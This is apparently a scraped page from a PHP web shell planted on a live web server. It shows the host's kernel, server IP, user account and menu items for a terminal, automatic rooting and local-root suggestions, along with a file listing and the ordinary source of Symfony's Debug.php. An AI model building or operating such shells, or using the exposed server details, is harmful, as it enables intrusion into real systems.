Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 216.73.216.94
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
vendor /
symfony /
error-handler /
Delete
Unzip
Name
Size
Permission
Date
Action
Error
[ DIR ]
drwxrwxr-x
2022-07-29 07:37
ErrorEnhancer
[ DIR ]
drwxrwxr-x
2022-07-29 07:37
ErrorRenderer
[ DIR ]
drwxrwxr-x
2022-07-29 07:37
Exception
[ DIR ]
drwxrwxr-x
2022-07-29 07:37
Internal
[ DIR ]
drwxrwxr-x
2022-07-29 07:37
Resources
[ DIR ]
drwxrwxr-x
2022-07-29 07:37
BufferingLogger.php
1.99
KB
-rw-rw-r--
2022-07-29 07:37
CHANGELOG.md
636
B
-rw-rw-r--
2022-07-29 07:37
Debug.php
1.08
KB
-rw-rw-r--
2022-07-29 07:37
DebugClassLoader.php
45.43
KB
-rw-rw-r--
2022-07-29 07:37
ErrorHandler.php
29.17
KB
-rw-rw-r--
2022-07-29 07:37
LICENSE
1.04
KB
-rw-rw-r--
2022-07-29 07:37
README.md
1.31
KB
-rw-rw-r--
2022-07-29 07:37
ThrowableUtils.php
895
B
-rw-rw-r--
2022-07-29 07:37
composer.json
1.01
KB
-rw-rw-r--
2022-07-29 07:37
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\ErrorHandler; /** * Registers all the debug tools. * * @author Fabien Potencier <fabien@symfony.com> */ class Debug { public static function enable(): ErrorHandler { error_reporting(-1); if (!\in_array(\PHP_SAPI, ['cli', 'phpdbg'], true)) { ini_set('display_errors', 0); } elseif (!filter_var(\ini_get('log_errors'), \FILTER_VALIDATE_BOOLEAN) || \ini_get('error_log')) { // CLI - display errors only if they're not already logged to STDERR ini_set('display_errors', 1); } @ini_set('zend.assertions', 1); ini_set('assert.active', 1); ini_set('assert.warning', 0); ini_set('assert.exception', 1); DebugClassLoader::enable(); return ErrorHandler::register(new ErrorHandler(new BufferingLogger(), true)); } }